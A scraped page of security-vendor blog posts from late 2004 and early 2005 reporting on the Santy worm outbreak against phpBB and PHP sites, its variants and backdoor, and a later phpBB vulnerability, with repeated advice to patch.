01 Mar Critical vulnerability found in phpBB software Roel
27 Dec Santy updates - worm renamed Aleks
26 Dec Update on Santy.e Roel
26 Dec New Santy also targets php vulnerabilities Roel
22 Dec Santy sourcecode publicly available Roel
22 Dec Preliminary evaluation of Santy outbreak Aleks
Join our blog
You can contribute to our blog if you have +100 points. Comment on articles and blogposts, and other users will rate your comments. You receive points for positive ratings.
phpBB.com have announced that their phpBB software contains a critical vulnerability.
This news comes just days after the release of 2.0.12, which was released to adress certain other vulnerabilities.
Exploitation of this vulnerability gives administrative rights, meaning arbitrary code can be executed.
This could mean that we see a Santy-like scenario all over again, with a lot of servers being affected.
Although I believe we would see only a few defaced websites in this case, instead I'm expecting a lot of zombies.
phpBB.com have released version 2.0.13 which is no longer vulnerable for this vulnerability.
You are severely urged to update to the latest version as soon as possible.
We've decided to rename Santy.d and Santy.e to Spyki.a and b. We are doing this because:
A deeper analysis of the new worm that we detected at the weekend, which seemed to be a new version of Santy, shows that it's different to Santy. The most important difference is that it doesn't exploit vulnerable versions of phpBB to spread. It attacks any vulnerability which contains the 'Remote file inclusion' vulnerability. So the problem is that this vulnerability isn't connected with which version of PHP is installed on the server - it happens because of errors in programming PHP pages.
Once the worm penetrates the server, it uploads Backdoor.Perl.Shellbot.a - also written in Perl. This backdoor connects with certain IRC channels to receive and execute commands from its author/ user.
The new worm uses the Brazilian Google server for search requests, and includes the copyright of the Brazil hacker group 'Atrix Team' - it seems that this group probably wrote the new worm.
We recommend everyone using PHP for web page programming to check their servers for errors. A description of the errors is here
A more detailed analysis of Santy.e is showing very worrying info.
The initial analysis suggested that with an updated version of php, one was not vulnerable for this attack, but it seems that Santy.e tries to exploit bad coding.
Santy.e tries to exploit php scripts with what is called "PHP Scripts Automated Arbitrary File Inclusion".
This can only be prevented with decent, secure coding.
This means that every site is potentially in danger.
There are already a fair lot of reports of websites that get 'attacked' by infected hosts.
Expect sites to get compromised or become (very) slow, as unshielded attacks will result in a (great) increase of server load, as the server has to process the incoming data.
Sites/servers will need to come up with a way to block the attacks.
We will see how this develops.
We have detected a new Santy variant which also targets vulnerabilties in older versions of php.
This new variant is more advanced/dangerous in a number of ways:
-Uses yahoo next to google to search for vulnerable sites.
-Targets next to 'phpBB pre 2.0.11' sites, also sites that use an older version of php.
-New Santy variants try to install a Bot, giving the masters control.
-Most sites have got huge bandwidth, this would make a spam run or DDoS extremely effective - although this is a side effect.
We detect the latest Santy variant as Net-Worm.Perl.Santy.e, the installed bot as Backdoor.Perl.Shellbot.b.
There are also some other new Perl Backdoors.
We would like to urge everybody to make sure their php is up to date. (Next to phpBB of course).
If you aren't the hoster of your site, contact the hoster even though it's christmas, malware doesn't wait till next week.
We have received information that the Santy sourcecode has been published on certain sites and security related mailinglists.
This opens the door for new variants to arise. However, I doubt that new variants will be very effective, unless search engines just keep on spitting out new, unpatched sites.
But seeing that a lot of sites are already infected, patched or a combination of both, I think the situation will not get as bad as we have seen now with Santy.a.
Google has announced that it will block search requests from Santy in order to prevent the worm from spreading further. I don't think that this is enough to solve the problem. The authour can always release new versions that use other search engines - MSN or Yahoo, for instance.
What is worse, we have discovered a new verision of Santy. It seems very likely that some 'script kiddies' have gotten hold of the source code. If this is true, they will create new versions with new features, just like Lovesan. The authour of Lovesan is still free, but several co-authours have been arrested, even though they only changed some text strings in the worm's file.
It is hard to count the exact number of site infected by Santy over the past 24 hours. Search engines only find the texts created by the worm that are still online. Many other sites have been disinfected or closed down. My first rough estimate would put the number at several hundred web sites worldwide. However, due to the above, the actual number may be well in the thousands.
PS So far the maximum number of Santy.a generations we have seen remains at 24:
New variant of Santy was found some hours ago. We detect it as Net-Worm.Perl.Santy.b.
Further analysis has shown that although older versions of phpBB are vulnerable, phpBB 2.0.11 is not.
Therefore we strongly urge everyone to update to phpBB 2.0.11 to prevent infection by this Worm.
Today we received reports about certain sites being defaced. Investigation has shown that a worm which utilizes a vulnerability in phpBB is responsible for this.
PhpBB is a very popular software to use for internet boards/forums, so this affects a lot of sites. Therefore we are putting a Red Alert on it.
Currently there is no patch for this problem, only a work-around, which can be found here.
The worm is extra tricky because it replaces asp/php/htm/shtm files with its own code, not only meaning that you might lose data, but also that other sites using the same host get infected.